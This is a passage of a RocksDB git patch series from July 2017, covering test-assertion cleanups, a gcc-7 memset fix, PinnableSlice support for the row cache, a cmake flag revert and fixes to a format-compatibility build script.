b/table/mock_table.cc index 9de04d69c60..7a2058bf9ec 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -137,7 +137,7 @@ void MockTableFactory::AssertLatestFile( ParseInternalKey(Slice(key), &ikey); std::cout << ikey.DebugString(false) << " -> " << value << std::endl; } - ASSERT_TRUE(false); + FAIL(); } } diff --git a/util/thread_local_test.cc b/util/thread_local_test.cc index 5806cf2653b..6fee5eaa574 100644 --- a/util/thread_local_test.cc +++ b/util/thread_local_test.cc @@ -569,7 +569,7 @@ TEST_F(ThreadLocalTest, DISABLED_MainThreadDiesFirst) { #ifndef ROCKSDB_LITE } catch (const std::system_error& ex) { std::cerr << "Start thread: " << ex.code() << std::endl; - ASSERT_TRUE(false); + FAIL(); } #endif // ROCKSDB_LITE } diff --git a/utilities/backupable/backupable_db_test.cc b/utilities/backupable/backupable_db_test.cc index d1a4bc60a79..be20a8d9b3d 100644 --- a/utilities/backupable/backupable_db_test.cc +++ b/utilities/backupable/backupable_db_test.cc @@ -101,7 +101,7 @@ class DummyDB : public StackableDB { virtual uint64_t LogNumber() const override { // what business do you have calling this method? - EXPECT_TRUE(false); + ADD_FAILURE(); return 0; } diff --git a/utilities/checkpoint/checkpoint_test.cc b/utilities/checkpoint/checkpoint_test.cc index 2872f3a426a..56c8c6e0505 100644 --- a/utilities/checkpoint/checkpoint_test.cc +++ b/utilities/checkpoint/checkpoint_test.cc @@ -372,7 +372,7 @@ TEST_F(CheckpointTest, CheckpointCFNoFlush) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCallFlush:start", [&](void* arg) { // Flush should never trigger. - ASSERT_TRUE(false); + FAIL(); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Checkpoint* checkpoint; diff --git a/utilities/lua/rocks_lua_test.cc b/utilities/lua/rocks_lua_test.cc index c075e032f7d..025acaf6d61 100644 --- a/utilities/lua/rocks_lua_test.cc +++ b/utilities/lua/rocks_lua_test.cc @@ -26,7 +26,7 @@ class StopOnErrorLogger : public Logger { virtual void Logv(const char* format, va_list ap) override { vfprintf(stderr, format, ap); fprintf(stderr, "\n"); - ASSERT_TRUE(false); + FAIL(); } }; diff --git a/utilities/persistent_cache/persistent_cache_test.cc b/utilities/persistent_cache/persistent_cache_test.cc index db9cf373fe7..5affc4085d0 100644 --- a/utilities/persistent_cache/persistent_cache_test.cc +++ b/utilities/persistent_cache/persistent_cache_test.cc @@ -372,7 +372,7 @@ void PersistentCacheDBTest::RunTest( options.table_factory.reset(NewBlockBasedTableFactory(table_options)); break; default: - ASSERT_TRUE(false); + FAIL(); } std::vector values; @@ -425,7 +425,7 @@ void PersistentCacheDBTest::RunTest( ASSERT_EQ(compressed_block_miss, 0); break; default: - ASSERT_TRUE(false); + FAIL(); } options.create_if_missing = true; diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index 90cec396b40..ce01388f8a8 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -242,7 +242,7 @@ TEST_P(TransactionTest, WaitingTxn) { // Column family is 1 or 0 (cfa). if (cf_iterator->first != 1 && cf_iterator->first != 0) { - ASSERT_FALSE(true); + FAIL(); } // The locked key is "foo" and is locked by txn1 ASSERT_EQ(cf_iterator->second.key, "foo"); @@ -253,7 +253,7 @@ TEST_P(TransactionTest, WaitingTxn) { // Column family is 0 (default) or 1. 
if (cf_iterator->first != 1 && cf_iterator->first != 0) { - ASSERT_FALSE(true); + FAIL(); } // The locked key is "foo" and is locked by txn1 ASSERT_EQ(cf_iterator->second.key, "foo"); @@ -1080,7 +1080,7 @@ TEST_P(TransactionTest, DISABLED_TwoPhaseMultiThreadTest) { env->SleepForMicroseconds(10); } } else { - ASSERT_TRUE(false); + FAIL(); } }); diff --git a/utilities/ttl/ttl_test.cc b/utilities/ttl/ttl_test.cc index 20300868807..586d0ce1f6c 100644 --- a/utilities/ttl/ttl_test.cc +++ b/utilities/ttl/ttl_test.cc @@ -131,7 +131,7 @@ class TtlTest : public testing::Test { batch.Delete(kv_it_->first); break; default: - ASSERT_TRUE(false); + FAIL(); } } db_ttl_->Write(wopts, &batch); @@ -184,12 +184,12 @@ class TtlTest : public testing::Test { if (ret == false || value_found == false) { fprintf(stderr, "KeyMayExist could not find key=%s in the database but" " should have\n", kv.first.c_str()); - ASSERT_TRUE(false); + FAIL(); } else if (val.compare(kv.second) != 0) { fprintf(stderr, " value for key=%s present in database is %s but" " should be %s\n", kv.first.c_str(), val.c_str(), kv.second.c_str()); - ASSERT_TRUE(false); + FAIL(); } } } @@ -239,18 +239,18 @@ class TtlTest : public testing::Test { } else { fprintf(stderr, "is present in db but was expected to be absent\n"); } - ASSERT_TRUE(false); + FAIL(); } else if (s.ok()) { if (test_compaction_change && v.compare(kNewValue_) != 0) { fprintf(stderr, " value for key=%s present in database is %s but " " should be %s\n", kv_it_->first.c_str(), v.c_str(), kNewValue_.c_str()); - ASSERT_TRUE(false); + FAIL(); } else if (!test_compaction_change && v.compare(kv_it_->second) !=0) { fprintf(stderr, " value for key=%s present in database is %s but " " should be %s\n", kv_it_->first.c_str(), v.c_str(), kv_it_->second.c_str()); - ASSERT_TRUE(false); + FAIL(); } } } From cbaab30449fdeea90e1d97721f1bbc25681e5e35 Mon Sep 17 00:00:00 2001 From: Daniel Black Date: Mon, 17 Jul 2017 10:33:12 -0700 Subject: [PATCH 005/205] table/block.h: change memset MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Summary: In gcc-7 the following is an error identified by -Werror=class-memaccess In file included from ./table/get_context.h:14:0, from db/version_set.cc:43: ./table/block.h: In constructor ‘rocksdb::BlockReadAmpBitmap::BlockReadAmpBitmap(size_t, size_t, rocksdb::Statistics*)’: ./table/block.h:73:53: error: ‘void* memset(void*, int, size_t)’ clearing an object of type ‘struct std::atomic<unsigned int>’ with no trivial copy-assignment; use value-initialization instead [-Werror=class-memaccess] memset(bitmap_, 0, bitmap_size * kBytesPersEntry); ^ In file included from ./db/version_set.h:23:0, from db/version_set.cc:12: /toolchain/include/c++/8.0.0/atomic:684:12: note: ‘struct std::atomic<unsigned int>’ declared here struct atomic<unsigned int> : __atomic_base<unsigned int> ^~~~~~~~~~~~~~~~~~~~ As a solution, the default initializer can be applied in list context.
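In sketch form, the fix relies on value-initialization of the array (an illustrative standalone snippet, not code from the patch; the element count is arbitrary):

#include <atomic>
#include <cstddef>
#include <cstdint>
#include <cstring>

int main() {
  const std::size_t n = 16;
  // gcc-7 rejects this under -Werror=class-memaccess, because
  // std::atomic<std::uint32_t> has no trivial copy-assignment:
  //   auto* a = new std::atomic<std::uint32_t>[n];
  //   memset(a, 0, n * sizeof(*a));
  // The trailing "()" value-initializes every element to zero instead:
  auto* b = new std::atomic<std::uint32_t>[n]();
  delete[] b;
  return 0;
}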
Signed-off-by: Daniel Black Closes https://github.com/facebook/rocksdb/pull/2561 Differential Revision: D5398714 Pulled By: siying fbshipit-source-id: d883fb88ec7535eee60d551038fe91f14488be36 --- table/block.h | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/table/block.h b/table/block.h index 044e076626d..59dc1674337 100644 --- a/table/block.h +++ b/table/block.h @@ -67,8 +67,7 @@ class BlockReadAmpBitmap { size_t bitmap_size = (num_bits_needed - 1) / kBitsPerEntry + 1; // Create bitmap and set all the bits to 0 - bitmap_ = new std::atomic<uint32_t>[bitmap_size]; - memset(bitmap_, 0, bitmap_size * kBytesPersEntry); + bitmap_ = new std::atomic<uint32_t>[bitmap_size](); RecordTick(GetStatistics(), READ_AMP_TOTAL_READ_BYTES, block_size); } From b2dd192fed1efae9a96a869f5d8b4f559726a41d Mon Sep 17 00:00:00 2001 From: Chris Lamb Date: Mon, 17 Jul 2017 11:17:05 -0700 Subject: [PATCH 006/205] tools/write_stress.cc: Correct "1204" typos. Summary: Should be 1024, obviously :) Closes https://github.com/facebook/rocksdb/pull/2592 Differential Revision: D5435269 Pulled By: ajkr fbshipit-source-id: c59338a3900798a4733f0b205e534f21215cf049 --- tools/write_stress.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/write_stress.cc b/tools/write_stress.cc index 597e93798c6..e5e4204a8d8 100644 --- a/tools/write_stress.cc +++ b/tools/write_stress.cc @@ -135,8 +135,8 @@ class WriteStress { // compactions options.create_if_missing = true; options.write_buffer_size = 256 * 1024; // 256k - options.max_bytes_for_level_base = 1 * 1024 * 1204; // 1MB - options.target_file_size_base = 100 * 1204; // 100k + options.max_bytes_for_level_base = 1 * 1024 * 1024; // 1MB + options.target_file_size_base = 100 * 1024; // 100k options.max_write_buffer_number = 16; options.max_background_compactions = 16; options.max_background_flushes = 16; From 00464a3140ea88e9e3575407cae14259aa779b8c Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Mon, 17 Jul 2017 14:51:19 -0700 Subject: [PATCH 007/205] Fix column_family_test with LITE build Summary: Fix column_family_test with LITE build. I need this patch to fix 5.6 branch. Closes https://github.com/facebook/rocksdb/pull/2597 Differential Revision: D5437171 Pulled By: yiwu-arbug fbshipit-source-id: 88b9dc5925a6b47af10c1b41bc5b07c4251a84b5 --- db/column_family_test.cc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/db/column_family_test.cc b/db/column_family_test.cc index 0d5f2dcf232..88786d469d5 100644 --- a/db/column_family_test.cc +++ b/db/column_family_test.cc @@ -521,6 +521,7 @@ TEST_F(ColumnFamilyTest, DontReuseColumnFamilyID) { } } +#ifndef ROCKSDB_LITE TEST_F(ColumnFamilyTest, CreateCFRaceWithGetAggProperty) { Open(); @@ -542,6 +543,7 @@ TEST_F(ColumnFamilyTest, CreateCFRaceWithGetAggProperty) { rocksdb::SyncPoint::GetInstance()->DisableProcessing(); } +#endif // !ROCKSDB_LITE class FlushEmptyCFTestWithParam : public ColumnFamilyTest, public testing::WithParamInterface<bool> { From 0655b585820dbc93b50fe1bdb3bc2d7d50047c95 Mon Sep 17 00:00:00 2001 From: Sushma Devendrappa Date: Mon, 17 Jul 2017 14:53:15 -0700 Subject: [PATCH 008/205] enable PinnableSlice for RowCache Summary: This patch enables using PinnableSlice for RowCache; the changes include not releasing the cache handle immediately after lookup in TableCache::Get, and instead passing a Cleanable cleanup function which releases the cache handle via Cache::Release.
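From the caller's perspective the effect is roughly the following (a sketch assuming an already-open DB with the row cache enabled; this is not code from the patch itself):

#include "rocksdb/db.h"

// With a PinnableSlice, a row-cache hit can be consumed without copying:
// releasing the cache handle is registered as a cleanup on the slice, so
// the cached value stays pinned until the slice is reset or destroyed.
void ReadWithoutCopy(rocksdb::DB* db) {
  rocksdb::PinnableSlice value;
  rocksdb::Status s = db->Get(rocksdb::ReadOptions(),
                              db->DefaultColumnFamily(), "key", &value);
  if (s.ok()) {
    // "value" may point directly into the row-cache entry here.
  }
  value.Reset();  // registered cleanups run; the handle is released now
}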
Closes https://github.com/facebook/rocksdb/pull/2492 Differential Revision: D5316216 Pulled By: maysamyabandeh fbshipit-source-id: d2a684bd7e4ba73772f762e58a82b5f4fbd5d362 --- cache/lru_cache.cc | 24 +++++++++++++++++++++--- cache/lru_cache.h | 8 ++++++++ db/db_test.cc | 31 +++++++++++++++++++++++++++++++ db/db_test_util.cc | 7 +++++++ db/db_test_util.h | 2 ++ db/table_cache.cc | 21 +++++++++++++++++++-- include/rocksdb/cleanable.h | 2 +- table/get_context.cc | 5 +++-- table/get_context.h | 3 ++- 9 files changed, 94 insertions(+), 9 deletions(-) diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index b201d81a4da..2a4c0f77a08 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -157,6 +157,16 @@ void LRUCacheShard::TEST_GetLRUList(LRUHandle** lru, LRUHandle** lru_low_pri) { *lru_low_pri = lru_low_pri_; } +size_t LRUCacheShard::TEST_GetLRUSize() { + LRUHandle* lru_handle = lru_.next; + size_t lru_size = 0; + while (lru_handle != &lru_) { + lru_size++; + lru_handle = lru_handle->next; + } + return lru_size; +} + void LRUCacheShard::LRU_Remove(LRUHandle* e) { assert(e->next != nullptr); assert(e->prev != nullptr); @@ -438,11 +448,11 @@ std::string LRUCacheShard::GetPrintableOptions() const { LRUCache::LRUCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit, double high_pri_pool_ratio) : ShardedCache(capacity, num_shard_bits, strict_capacity_limit) { - int num_shards = 1 << num_shard_bits; - shards_ = new LRUCacheShard[num_shards]; + num_shards_ = 1 << num_shard_bits; + shards_ = new LRUCacheShard[num_shards_]; SetCapacity(capacity); SetStrictCapacityLimit(strict_capacity_limit); - for (int i = 0; i < num_shards; i++) { + for (int i = 0; i < num_shards_; i++) { shards_[i].SetHighPriorityPoolRatio(high_pri_pool_ratio); } } @@ -471,6 +481,14 @@ uint32_t LRUCache::GetHash(Handle* handle) const { void LRUCache::DisownData() { shards_ = nullptr; } +size_t LRUCache::TEST_GetLRUSize() { + size_t lru_size_of_all_shards = 0; + for (int i = 0; i < num_shards_; i++) { + lru_size_of_all_shards += shards_[i].TEST_GetLRUSize(); + } + return lru_size_of_all_shards; +} + std::shared_ptr<Cache> NewLRUCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit, double high_pri_pool_ratio) { diff --git a/cache/lru_cache.h b/cache/lru_cache.h index 4b6a9f2fec3..5fbe0f26459 100644 --- a/cache/lru_cache.h +++ b/cache/lru_cache.h @@ -198,6 +198,10 @@ class LRUCacheShard : public CacheShard { void TEST_GetLRUList(LRUHandle** lru, LRUHandle** lru_low_pri); + // Retrieves number of elements in LRU, for unit test purpose only + // not threadsafe + size_t TEST_GetLRUSize(); + private: void LRU_Remove(LRUHandle* e); void LRU_Insert(LRUHandle* e); @@ -267,8 +271,12 @@ class LRUCache : public ShardedCache { virtual uint32_t GetHash(Handle* handle) const override; virtual void DisownData() override; + // Retrieves number of elements in LRU, for unit test purpose only + size_t TEST_GetLRUSize(); + private: LRUCacheShard* shards_; + int num_shards_ = 0; }; } // namespace rocksdb diff --git a/db/db_test.cc b/db/db_test.cc index 70f54250ba9..e9840faa042 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -23,6 +23,7 @@ #include #endif +#include "cache/lru_cache.h" #include "db/db_impl.h" #include "db/db_test_util.h" #include "db/dbformat.h" @@ -5320,6 +5321,36 @@ TEST_F(DBTest, RowCache) { ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_HIT), 1); ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_MISS), 1); } + +TEST_F(DBTest, PinnableSliceAndRowCache) { + Options options = CurrentOptions(); +
options.statistics = rocksdb::CreateDBStatistics(); + options.row_cache = NewLRUCache(8192); + DestroyAndReopen(options); + + ASSERT_OK(Put("foo", "bar")); + ASSERT_OK(Flush()); + + ASSERT_EQ(Get("foo"), "bar"); + ASSERT_EQ( + reinterpret_cast<LRUCache*>(options.row_cache.get())->TEST_GetLRUSize(), + 1); + + { + PinnableSlice pin_slice; + ASSERT_EQ(Get("foo", &pin_slice), Status::OK()); + ASSERT_EQ(pin_slice.ToString(), "bar"); + // Entry is already in cache, lookup will remove the element from lru + ASSERT_EQ( + reinterpret_cast<LRUCache*>(options.row_cache.get())->TEST_GetLRUSize(), + 0); + } + // After PinnableSlice destruction element is added back in LRU + ASSERT_EQ( + reinterpret_cast<LRUCache*>(options.row_cache.get())->TEST_GetLRUSize(), + 1); +} + #endif // ROCKSDB_LITE TEST_F(DBTest, DeletingOldWalAfterDrop) { diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 7de6cff3e7a..5ca4b19a253 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -686,6 +686,13 @@ std::string DBTestBase::Get(int cf, const std::string& k, return result; } +Status DBTestBase::Get(const std::string& k, PinnableSlice* v) { + ReadOptions options; + options.verify_checksums = true; + Status s = dbfull()->Get(options, dbfull()->DefaultColumnFamily(), k, v); + return s; +} + uint64_t DBTestBase::GetNumSnapshots() { uint64_t int_num; EXPECT_TRUE(dbfull()->GetIntProperty("rocksdb.num-snapshots", &int_num)); diff --git a/db/db_test_util.h b/db/db_test_util.h index 5fb3f0c81b7..cd1265e21f1 100644 --- a/db/db_test_util.h +++ b/db/db_test_util.h @@ -803,6 +803,8 @@ class DBTestBase : public testing::Test { std::string Get(int cf, const std::string& k, const Snapshot* snapshot = nullptr); + Status Get(const std::string& k, PinnableSlice* v); + uint64_t GetNumSnapshots(); uint64_t GetTimeOldestSnapshots(); diff --git a/db/table_cache.cc b/db/table_cache.cc index 398556a08f9..4dc56935fbc 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -311,6 +311,7 @@ Status TableCache::Get(const ReadOptions& options, #ifndef ROCKSDB_LITE IterKey row_cache_key; std::string row_cache_entry_buffer; + // Check row cache if enabled. Since row cache does not currently store // sequence numbers, we cannot use it if we need to fetch the sequence. if (ioptions_.row_cache && !get_context->NeedToReadSequence()) { @@ -334,10 +335,26 @@ Status TableCache::Get(const ReadOptions& options, if (auto row_handle = ioptions_.row_cache->Lookup(row_cache_key.GetUserKey())) { + // Cleanable routine to release the cache entry + Cleanable value_pinner; + auto release_cache_entry_func = [](void* cache_to_clean, + void* cache_handle) { + ((Cache*)cache_to_clean)->Release((Cache::Handle*)cache_handle); + }; auto found_row_cache_entry = static_cast<const std::string*>( ioptions_.row_cache->Value(row_handle)); - replayGetContextLog(*found_row_cache_entry, user_key, get_context); - ioptions_.row_cache->Release(row_handle); + // If it comes here value is located on the cache. + // found_row_cache_entry points to the value on cache, + // and value_pinner has cleanup procedure for the cached entry. + // After replayGetContextLog() returns, get_context.pinnable_slice_ + // will point to cache entry buffer (or a copy based on that) and + // cleanup routine under value_pinner will be delegated to + // get_context.pinnable_slice_. Cache entry is released when + // get_context.pinnable_slice_ is reset.
+ value_pinner.RegisterCleanup(release_cache_entry_func, + ioptions_.row_cache.get(), row_handle); + replayGetContextLog(*found_row_cache_entry, user_key, get_context, + &value_pinner); RecordTick(ioptions_.statistics, ROW_CACHE_HIT); done = true; } else { diff --git a/include/rocksdb/cleanable.h b/include/rocksdb/cleanable.h index ecc172b44bb..0f45c7108ad 100644 --- a/include/rocksdb/cleanable.h +++ b/include/rocksdb/cleanable.h @@ -33,7 +33,7 @@ class Cleanable { typedef void (*CleanupFunction)(void* arg1, void* arg2); void RegisterCleanup(CleanupFunction function, void* arg1, void* arg2); void DelegateCleanupsTo(Cleanable* other); - // DoCkeanup and also resets the pointers for reuse + // DoCleanup and also resets the pointers for reuse inline void Reset() { DoCleanup(); cleanup_.function = nullptr; diff --git a/table/get_context.cc b/table/get_context.cc index 2b49eba6abd..0d688fe4609 100644 --- a/table/get_context.cc +++ b/table/get_context.cc @@ -180,7 +180,7 @@ bool GetContext::SaveValue(const ParsedInternalKey& parsed_key, } void replayGetContextLog(const Slice& replay_log, const Slice& user_key, - GetContext* get_context) { + GetContext* get_context, Cleanable* value_pinner) { #ifndef ROCKSDB_LITE Slice s = replay_log; while (s.size()) { @@ -194,7 +194,8 @@ void replayGetContextLog(const Slice& replay_log, const Slice& user_key, // Since SequenceNumber is not stored and unknown, we will use // kMaxSequenceNumber. get_context->SaveValue( - ParsedInternalKey(user_key, kMaxSequenceNumber, type), value, nullptr); + ParsedInternalKey(user_key, kMaxSequenceNumber, type), value, + value_pinner); } #else // ROCKSDB_LITE assert(false); diff --git a/table/get_context.h b/table/get_context.h index ee8a3beab9f..ac50680b645 100644 --- a/table/get_context.h +++ b/table/get_context.h @@ -86,6 +86,7 @@ class GetContext { }; void replayGetContextLog(const Slice& replay_log, const Slice& user_key, - GetContext* get_context); + GetContext* get_context, + Cleanable* value_pinner = nullptr); } // namespace rocksdb From 7ac184c6d794fc77fe75e57686aaa177059c7560 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Mon, 17 Jul 2017 14:54:40 -0700 Subject: [PATCH 009/205] Revert cmake -DNDEBUG for non-MSVC Summary: Unfortunately we can't use -DNDEBUG yet since we don't properly exclude the test libraries/executables from the non-debug builds on non-MSVC platforms. Previously this was failing on Linux for every build type except `CMAKE_BUILD_TYPE=Debug`. Reverts a48a62d Closes https://github.com/facebook/rocksdb/pull/2595 Differential Revision: D5436182 Pulled By: ajkr fbshipit-source-id: 062f07cc9ce06a073b66054722b27bac1890dca3 --- CMakeLists.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index 1d0ad1cb06e..2d56c8d7daf 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -174,7 +174,6 @@ else() endif() set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11") if(NOT CMAKE_BUILD_TYPE STREQUAL "Debug") - add_definitions(-DNDEBUG) set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O2 -fno-omit-frame-pointer") include(CheckCXXCompilerFlag) CHECK_CXX_COMPILER_FLAG("-momit-leaf-frame-pointer" HAVE_OMIT_LEAF_FRAME_POINTER) From 0c03a7f17d253839d1f0659798d98d1ac311218a Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Mon, 17 Jul 2017 19:35:23 -0700 Subject: [PATCH 010/205] set the remote for git checkout Summary: This will fix the error: "error: pathspec '2.2.fb.branch' did not match any file(s) known to git." Tested by manually sshing to sandcastle and running the command. 
Closes https://github.com/facebook/rocksdb/pull/2599 Differential Revision: D5441130 Pulled By: maysamyabandeh fbshipit-source-id: a22fd6a52221471bafbba8990394b499535e5812 --- tools/check_format_compatible.sh | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/tools/check_format_compatible.sh b/tools/check_format_compatible.sh index 300aaf08958..d3d07d00b3a 100755 --- a/tools/check_format_compatible.sh +++ b/tools/check_format_compatible.sh @@ -76,7 +76,7 @@ https_proxy="fwdproxy:8080" git fetch github_origin for checkout_obj in "${checkout_objs[@]}" do echo == Generating DB from "$checkout_obj" ... - git checkout $checkout_obj + https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_obj -b $checkout_obj make clean make ldb -j32 generate_db $input_data_path $test_dir/$checkout_obj done checkout_flag=${1:-"master"} echo == Building $checkout_flag debug -git checkout $checkout_flag +https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_flag -b $checkout_flag make clean make ldb -j32 compare_base_db_dir=$test_dir"/base_db_dir" @@ -101,7 +101,7 @@ done for checkout_obj in "${forward_compatible_checkout_objs[@]}" do echo == Build "$checkout_obj" and try to open DB generated using $checkout_flag... - git checkout $checkout_obj + https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_obj -b $checkout_obj make clean make ldb -j32 compare_db $test_dir/$checkout_obj $compare_base_db_dir forward_${checkout_obj}_dump.txt 0 From a7321fc97fc645585868642c7cb55b0eb5d8e5b8 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 18 Jul 2017 08:16:58 -0700 Subject: [PATCH 011/205] avoid collision with master branch in check format Summary: The new local branch specified with -b cannot be called master. Use tmp prefix to avoid name collision. Closes https://github.com/facebook/rocksdb/pull/2600 Differential Revision: D5442944 Pulled By: maysamyabandeh fbshipit-source-id: 4a623d9b21d6cc01bee812b2799790315bdf5f6e --- tools/check_format_compatible.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/check_format_compatible.sh b/tools/check_format_compatible.sh index d3d07d00b3a..820fb42c5e9 100755 --- a/tools/check_format_compatible.sh +++ b/tools/check_format_compatible.sh @@ -85,7 +85,7 @@ checkout_flag=${1:-"master"} echo == Building $checkout_flag debug -https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_flag -b $checkout_flag +https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_flag -b tmp-$checkout_flag make clean make ldb -j32 compare_base_db_dir=$test_dir"/base_db_dir" @@ -101,7 +101,7 @@ done for checkout_obj in "${forward_compatible_checkout_objs[@]}" do echo == Build "$checkout_obj" and try to open DB generated using $checkout_flag... - git checkout $checkout_obj + https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_obj -b $checkout_obj make clean make ldb -j32 compare_db $test_dir/$checkout_obj $compare_base_db_dir forward_${checkout_obj}_dump.txt 0 From ddb22ac59c0fe54636e89639f687fe3625b0144d Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 18 Jul 2017 10:29:36 -0700 Subject: [PATCH 012/205] checkout local branch in check_format_compatible.sh Summary: For forward_compatible_checkout_objs the local branch is already created in a previous step. This patch avoids recreating it. This should address "fatal: A branch named '3.10.fb' already exists." errors.
Closes https://github.com/facebook/rocksdb/pull/2606 Differential Revision: D5443786 Pulled By: maysamyabandeh fbshipit-source-id: 69d5a67b87677429cf36e3a467bd114d341f3b9c --- tools/check_format_compatible.sh | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/tools/check_format_compatible.sh b/tools/check_format_compatible.sh index 820fb42c5e9..2f3805e5ab2 100755 --- a/tools/check_format_compatible.sh +++ b/tools/check_format_compatible.sh @@ -41,8 +41,9 @@ with open('${input_data[$i]}', 'w') as f: EOF done -declare -a checkout_objs=("2.2.fb.branch" "2.3.fb.branch" "2.4.fb.branch" "2.5.fb.branch" "2.6.fb.branch" "2.7.fb.branch" "2.8.1.fb" "3.0.fb.branch" "3.1.fb" "3.2.fb" "3.3.fb" "3.4.fb" "3.5.fb" "3.6.fb" "3.7.fb" "3.8.fb" "3.9.fb" "3.10.fb" "3.11.fb" "3.12.fb" "3.13.fb" "4.0.fb" "4.1.fb" "4.2.fb" "4.3.fb" "4.4.fb" "4.5.fb" "4.6.fb" "4.7.fb" "4.8.fb" "4.9.fb" "4.10.fb" "4.11.fb" "4.12.fb" "4.13.fb" "5.0.fb" "5.1.fb" "5.2.fb" "5.3.fb" "5.4.fb" "5.5.fb" "5.6.fb") +declare -a backward_compatible_checkout_objs=("2.2.fb.branch" "2.3.fb.branch" "2.4.fb.branch" "2.5.fb.branch" "2.6.fb.branch" "2.7.fb.branch" "2.8.1.fb" "3.0.fb.branch" "3.1.fb" "3.2.fb" "3.3.fb" "3.4.fb" "3.5.fb" "3.6.fb" "3.7.fb" "3.8.fb" "3.9.fb") declare -a forward_compatible_checkout_objs=("3.10.fb" "3.11.fb" "3.12.fb" "3.13.fb" "4.0.fb" "4.1.fb" "4.2.fb" "4.3.fb" "4.4.fb" "4.5.fb" "4.6.fb" "4.7.fb" "4.8.fb" "4.9.fb" "4.10.fb" "4.11.fb" "4.12.fb" "4.13.fb" "5.0.fb" "5.1.fb" "5.2.fb" "5.3.fb" "5.4.fb" "5.5.fb" "5.6.fb") +declare -a checkout_objs=(${backward_compatible_checkout_objs[@]} ${forward_compatible_checkout_objs[@]}) generate_db() { @@ -101,7 +102,7 @@ done for checkout_obj in "${forward_compatible_checkout_objs[@]}" do echo == Build "$checkout_obj" and try to open DB generated using $checkout_flag... - https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_obj -b $checkout_obj + git checkout $checkout_obj make clean make ldb -j32 compare_db $test_dir/$checkout_obj $compare_base_db_dir forward_${checkout_obj}_dump.txt 0 From 33b1de82a7b0f0788cd7023e138e733925b11fef Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Tue, 18 Jul 2017 10:57:10 -0700 Subject: [PATCH 013/205] Remove format compatibility hack Summary: We don't need this format compatibility hack anymore. We should remove it to make things simpler. 
Closes https://github.com/facebook/rocksdb/pull/2607 Differential Revision: D5444107 Pulled By: siying fbshipit-source-id: 7ef587dd0cacfc15a4083a137adba8e6bfddac7e --- build_tools/rocksdb-lego-determinator | 34 +-------------------------- 1 file changed, 1 insertion(+), 33 deletions(-) diff --git a/build_tools/rocksdb-lego-determinator b/build_tools/rocksdb-lego-determinator index 044c3df354c..09e79f376a8 100755 --- a/build_tools/rocksdb-lego-determinator +++ b/build_tools/rocksdb-lego-determinator @@ -583,39 +583,7 @@ run_format_compatible() rm -rf /dev/shm/rocksdb mkdir /dev/shm/rocksdb - echo ' - if [ -e "build_tools/build_detect_platform" ] - then - sed "s/tcmalloc/nothingnothingnothing/g" build_tools/build_detect_platform > $TEST_TMPDIR/temp_build_file - rm -rf build_tools/build_detect_platform - cp $TEST_TMPDIR/temp_build_file build_tools/build_detect_platform - chmod +x build_tools/build_detect_platform - fi - - if [ -e "build_detect_platform" ] - then - sed "s/tcmalloc/nothingnothingnothing/g" build_detect_platform > $TEST_TMPDIR/temp_build_file - rm -rf build_detect_platform - cp $TEST_TMPDIR/temp_build_file build_detect_platform - chmod +x build_detect_platform - fi - - make ldb -j32 - - if [ -e "build_detect_platform" ] - then - git checkout -- build_detect_platform - fi - - if [ -e "build_tools/build_detect_platform" ] - then - git checkout -- build_tools/build_detect_platform - fi - ' > temp_build_ldb.sh - - sed "s/make ldb -j32/source temp_build_ldb.sh/g" tools/check_format_compatible.sh > tools/temp_check_format_compatible.sh - chmod +x tools/temp_check_format_compatible.sh - tools/temp_check_format_compatible.sh + tools/check_format_compatible.sh } FORMAT_COMPATIBLE_COMMANDS="[ From ae28634e9f7aae8b06a38542685c32ba84fb7485 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Tue, 18 Jul 2017 11:46:31 -0700 Subject: [PATCH 014/205] Remove some left-over BSD headers Summary: Closes https://github.com/facebook/rocksdb/pull/2608 Differential Revision: D5444797 Pulled By: siying fbshipit-source-id: 690581d03f37822e059a16085088e8e2d8a45016 --- db/compaction_iterator.cc | 2 -- db/compaction_iterator.h | 2 -- db/comparator_db_test.cc | 2 -- db/convenience.cc | 3 --- db/db_filesnapshot.cc | 3 --- db/plain_table_db_test.cc | 2 -- table/mock_table.cc | 2 -- table/mock_table.h | 2 -- 8 